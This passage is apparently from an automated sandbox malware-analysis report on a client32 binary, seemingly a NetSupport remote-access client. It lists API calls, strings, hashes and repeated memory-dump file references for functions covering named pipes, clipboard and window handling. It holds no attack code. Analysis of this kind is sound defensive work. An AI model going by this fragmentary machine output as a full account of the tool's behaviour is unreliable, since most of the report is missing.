                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: RectWindow$IconicMetricsSystem$ClientErrorExitLastMessageProcesswsprintf
                                                                                                                                                                • String ID: ..\ctl32\nsmdlg.cpp$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_eh$m_hWnd
                                                                                                                                                                • API String ID: 2655531791-1552842965
                                                                                                                                                                • Opcode ID: 336b00d43c8ecb03fd1d32f6a3e6328df4ddd987a58dd775271b0821d673290e
                                                                                                                                                                • Instruction ID: 7d040125c55bf73af4456014bc99c48d8e10f47c0045797434645e7542fd0d49
                                                                                                                                                                • Opcode Fuzzy Hash: 336b00d43c8ecb03fd1d32f6a3e6328df4ddd987a58dd775271b0821d673290e
                                                                                                                                                                • Instruction Fuzzy Hash: 2C51C175E0061AAFCB10CFA4CC84FEEB7F8FB48754F0481A9E915A7280EA74A940CF50
                                                                                                                                                                Function 110F33F0 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 79pipesleepmemoryCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,00000014,?,00000000), ref: 110F33FC
                                                                                                                                                                • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 110F3425
                                                                                                                                                                • SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000), ref: 110F3432
                                                                                                                                                                • CreateNamedPipeA.KERNEL32(?,00000003,00000006,00000001,?,?,000003E8,?), ref: 110F3463
                                                                                                                                                                • GetLastError.KERNEL32 ref: 110F3470
                                                                                                                                                                • Sleep.KERNEL32(000003E8), ref: 110F348F
                                                                                                                                                                • CreateNamedPipeA.KERNEL32(?,00000003,00000006,00000001,00000001,?,000003E8,0000000C), ref: 110F34AE
                                                                                                                                                                • LocalFree.KERNEL32(?), ref: 110F34BF
                                                                                                                                                                  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                                                                  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                                                                  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                                                                  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                                                                                Strings
                                                                                                                                                                • e:\nsmsrc\nsm\1210\1210f\client32\platnt.cpp, xrefs: 110F3410
                                                                                                                                                                • CreateNamedPipe %s failed, error %d, xrefs: 110F3478
                                                                                                                                                                • pSD, xrefs: 110F3415
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateDescriptorErrorLastLocalNamedPipeSecurity$AllocDaclExitFreeInitializeMessageProcessSleepwsprintf
                                                                                                                                                                • String ID: CreateNamedPipe %s failed, error %d$e:\nsmsrc\nsm\1210\1210f\client32\platnt.cpp$pSD
                                                                                                                                                                • API String ID: 3134831419-838605531
                                                                                                                                                                • Opcode ID: 6fb66e34af5f69f470863fb769d28e04784f24a47ad29a0bb3f1c0886bbebacf
                                                                                                                                                                • Instruction ID: e749730b24da6d9d65aa5dc542e4a1298255c3932a1a24cca1bc6d9c8703c538
                                                                                                                                                                • Opcode Fuzzy Hash: 6fb66e34af5f69f470863fb769d28e04784f24a47ad29a0bb3f1c0886bbebacf
                                                                                                                                                                • Instruction Fuzzy Hash: 0821DD75E54229BBE7119B64CC8AFAFB76CE744719F014210FE25672C0C7B05A018790
                                                                                                                                                                Function 11115750 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 109fileCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,00000000,11025FDE), ref: 1111578B
                                                                                                                                                                • GetShortPathNameA.KERNEL32(?,?,00000104), ref: 111157A0
                                                                                                                                                                  • Part of subcall function 11081B40: _strrchr.LIBCMT ref: 11081B4E
                                                                                                                                                                • CreateFileA.KERNEL32(?,00000000,00000000,00000000,00000000,04000000,00000000), ref: 111157F9
                                                                                                                                                                • CreateFileA.KERNEL32(?,00000000,00000000,00000000,00000000,04000000,00000000), ref: 1111583D
                                                                                                                                                                • DeviceIoControl.KERNEL32(00000000,00000100,00000000,00000000,?,00000004,?,00000000), ref: 1111586C
                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 11115896
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: File$CreateName$CloseControlDeviceHandleModulePathShort_strrchr
                                                                                                                                                                • String ID: \\.\$nsmvxd.386$pcdvxd.386
                                                                                                                                                                • API String ID: 1856440361-3179819359
                                                                                                                                                                • Opcode ID: c23de974ba00f03547b25e2f40332119e28910f2fea34cb9d27f0557c0e7f6c0
                                                                                                                                                                • Instruction ID: 2a95a0e342f63f1705806fe8621d4f60ab1de585f301dcf54d2bbd4509b04617
                                                                                                                                                                • Opcode Fuzzy Hash: c23de974ba00f03547b25e2f40332119e28910f2fea34cb9d27f0557c0e7f6c0
                                                                                                                                                                • Instruction Fuzzy Hash: 3541C331A44318ABE724DF64DC91FDAF7B5AB48708F0081A9E269DB2C4D7B16944CB94
                                                                                                                                                                Function 1101F6B0 Relevance: 15.1, APIs: 10, Instructions: 54clipboardmemorywindowCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • OpenClipboard.USER32(?), ref: 1101F6D7
                                                                                                                                                                • GlobalAlloc.KERNEL32(00002002,00000002), ref: 1101F6E7
                                                                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 1101F6F0
                                                                                                                                                                • _memmove.LIBCMT ref: 1101F6F9
                                                                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 1101F702
                                                                                                                                                                • EmptyClipboard.USER32 ref: 1101F708
                                                                                                                                                                • SetClipboardData.USER32(00000001,00000000), ref: 1101F711
                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 1101F71C
                                                                                                                                                                • MessageBeep.USER32(00000030), ref: 1101F724
                                                                                                                                                                • CloseClipboard.USER32 ref: 1101F72A
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ClipboardGlobal$AllocBeepCloseDataEmptyFreeLockMessageOpenUnlock_memmove
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3255624709-0
                                                                                                                                                                • Opcode ID: fb15205abc29bec5019ffcbc0ab34e754b0c0ba96522bb8b908837259c46bf13
                                                                                                                                                                • Instruction ID: 34c6a6685e13fb0ccb6c07c6f506601fca20899cc20b0e7c19a582f503bea576
                                                                                                                                                                • Opcode Fuzzy Hash: fb15205abc29bec5019ffcbc0ab34e754b0c0ba96522bb8b908837259c46bf13
                                                                                                                                                                • Instruction Fuzzy Hash: 9301D83A9155266BE3066B708CCCEABBAECFF9535D7051078F425C6108EB64C9058762
                                                                                                                                                                Function 11033010 Relevance: 14.3, APIs: 3, Strings: 5, Instructions: 312COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: CheckClip Error: Can't open clip, e=%d$Client$DisableClipBoard$Sendclip Error: Cant open clip$openclip Error: Cant open clip
                                                                                                                                                                • API String ID: 0-293745777
                                                                                                                                                                • Opcode ID: 5f040545b05273c81cb9d4a4bd22d43a279a27486dfb0bd605f0804696ac8a8f
                                                                                                                                                                • Instruction ID: daee403c678e01c213c7a1d72acf829bd0b7d6ab4ed81c5860d9e9f482a37d6e
                                                                                                                                                                • Opcode Fuzzy Hash: 5f040545b05273c81cb9d4a4bd22d43a279a27486dfb0bd605f0804696ac8a8f
                                                                                                                                                                • Instruction Fuzzy Hash: 7AA1F535B102069FD710DFA5DC91FAAF3A4EFD834AF10459DEA4A9B380DA31B940CB91
                                                                                                                                                                Function 11093080 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(11147750), ref: 11093089
                                                                                                                                                                  • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                                                                                                  • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                                                                                                  • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                                                                                                • OpenEventA.KERNEL32(001F0003,00000000,NSMFindClassEvent), ref: 110930B9
                                                                                                                                                                • FindWindowA.USER32(NSMClassList,00000000), ref: 110930CA
                                                                                                                                                                • SetForegroundWindow.USER32(00000000), ref: 110930D1
                                                                                                                                                                  • Part of subcall function 110914F0: GlobalAddAtomA.KERNEL32(NSMClassList), ref: 11091552
                                                                                                                                                                  • Part of subcall function 11092FF0: GetClassInfoA.USER32(110930EC,NSMClassList,?), ref: 11093004
                                                                                                                                                                  • Part of subcall function 11091620: CreateWindowExA.USER32(00000000,NSMClassList,00000000,00000000), ref: 1109166D
                                                                                                                                                                  • Part of subcall function 11091620: UpdateWindow.USER32(?), ref: 110916BF
                                                                                                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000001,NSMFindClassEvent,?,00000000,?,00000000), ref: 11093111
                                                                                                                                                                  • Part of subcall function 110916D0: GetMessageA.USER32(?,00000000,00000000,00000000), ref: 110916EA
                                                                                                                                                                  • Part of subcall function 110916D0: TranslateAcceleratorA.USER32(?,?,?,?,?,?,11093120,?,00000000,?,00000000), ref: 11091717
                                                                                                                                                                  • Part of subcall function 110916D0: TranslateMessage.USER32(?), ref: 11091721
                                                                                                                                                                  • Part of subcall function 110916D0: DispatchMessageA.USER32(?), ref: 1109172B
                                                                                                                                                                  • Part of subcall function 110916D0: GetMessageA.USER32(?,00000000,00000000,00000000), ref: 1109173B
                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,00000000,?,00000000), ref: 11093135
                                                                                                                                                                  • Part of subcall function 11091590: GlobalDeleteAtom.KERNEL32(00000000), ref: 110915CE
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: MessageWindow$AtomCreateEventGlobalTranslate$AcceleratorClassCloseDeleteDispatchExceptionFilterFindForegroundHandleInfoOpenUnhandledUpdate_malloc_memsetwsprintf
                                                                                                                                                                • String ID: NSMClassList$NSMFindClassEvent
                                                                                                                                                                • API String ID: 1622498684-2883797795
                                                                                                                                                                • Opcode ID: a756580c972c2b1c89b543717e50c84920c15868da069fb40308e575ba74b854
                                                                                                                                                                • Instruction ID: dc520b378aeee27ae2973ce0394f0415fb857a8947d0a09b3e9437a491b5cd63
                                                                                                                                                                • Opcode Fuzzy Hash: a756580c972c2b1c89b543717e50c84920c15868da069fb40308e575ba74b854
                                                                                                                                                                • Instruction Fuzzy Hash: 7111E976F4821D77EB00A6B51C69F6FBADC5B847A8F001024F92DD62C4EF14E401A7A6
                                                                                                                                                                Function 1115B1D0 Relevance: 13.6, APIs: 9, Instructions: 125windowCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 11142DD0: _memset.LIBCMT ref: 11142DF9
                                                                                                                                                                  • Part of subcall function 11142DD0: GetVersionExA.KERNEL32(?), ref: 11142E12
                                                                                                                                                                • _memset.LIBCMT ref: 1115B266
                                                                                                                                                                • SendMessageA.USER32(?,000005FF,00000000,00000000), ref: 1115B29C
                                                                                                                                                                • ShowWindow.USER32(?,00000006,?,?,?,?,?), ref: 1115B2AC
                                                                                                                                                                • GetDesktopWindow.USER32 ref: 1115B309
                                                                                                                                                                • TileWindows.USER32(00000000,?,?,?,?), ref: 1115B310
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Window_memset$DesktopMessageSendShowTileVersionWindows
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2935161463-0
                                                                                                                                                                • Opcode ID: d66091308fdfd0a49dadcbc9bdab6e46a9e7118830d76630c2efa76ef6861ce1
                                                                                                                                                                • Instruction ID: b14402a4e76bbdd80eea2f1b3df88d79255beb3666519cd349b4ccd6d2fbdf9c
                                                                                                                                                                • Opcode Fuzzy Hash: d66091308fdfd0a49dadcbc9bdab6e46a9e7118830d76630c2efa76ef6861ce1
                                                                                                                                                                • Instruction Fuzzy Hash: 39410271A00205ABEB809F64CDC5B6EF7B9FF46354F104065E925EB280DB70E940CFA9
                                                                                                                                                                Function 11147750 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 74keyboardCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetLastError.KERNEL32 ref: 1114776D
                                                                                                                                                                • wsprintfA.USER32 ref: 1114778B
                                                                                                                                                                • OutputDebugStringA.KERNEL32(?), ref: 111477A1
                                                                                                                                                                  • Part of subcall function 11143DE0: GetTickCount.KERNEL32 ref: 11143E48
                                                                                                                                                                  • Part of subcall function 11147400: GetCurrentThreadId.KERNEL32 ref: 11147413
                                                                                                                                                                  • Part of subcall function 11147400: wsprintfA.USER32 ref: 11147493
                                                                                                                                                                  • Part of subcall function 11147400: IsBadReadPtr.KERNEL32(?,00000001), ref: 111474B8
                                                                                                                                                                  • Part of subcall function 11147400: wsprintfA.USER32 ref: 111474D8
                                                                                                                                                                  • Part of subcall function 11147400: wsprintfA.USER32 ref: 111474F5
                                                                                                                                                                • OutputDebugStringA.KERNEL32(?), ref: 111477E6
                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 111477E9
                                                                                                                                                                  • Part of subcall function 110B7A70: GetLastError.KERNEL32(1110F4CB,11194AB8,?,?,11029561,?,11194AB8,1110F4CB,00000000), ref: 110B7A9C
                                                                                                                                                                  • Part of subcall function 110B7A70: _strrchr.LIBCMT ref: 110B7AAB
                                                                                                                                                                  • Part of subcall function 110B7A70: _strrchr.LIBCMT ref: 110B7ACD
                                                                                                                                                                  • Part of subcall function 110B7A70: GetTickCount.KERNEL32 ref: 110B7AFD
                                                                                                                                                                  • Part of subcall function 110B7A70: GetTickCount.KERNEL32 ref: 110B7B28
                                                                                                                                                                  • Part of subcall function 110B7A70: GetMessageA.USER32(?,00000000,00000000,00000000), ref: 110B7B4C
                                                                                                                                                                  • Part of subcall function 110B7A70: TranslateMessage.USER32(?), ref: 110B7B55
                                                                                                                                                                  • Part of subcall function 110B7A70: DispatchMessageA.USER32(?), ref: 110B7B5E
                                                                                                                                                                • GetKeyState.USER32(00000011), ref: 11147809
                                                                                                                                                                Strings
                                                                                                                                                                • Exception caught at %x. Trying minidump., xrefs: 11147785
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
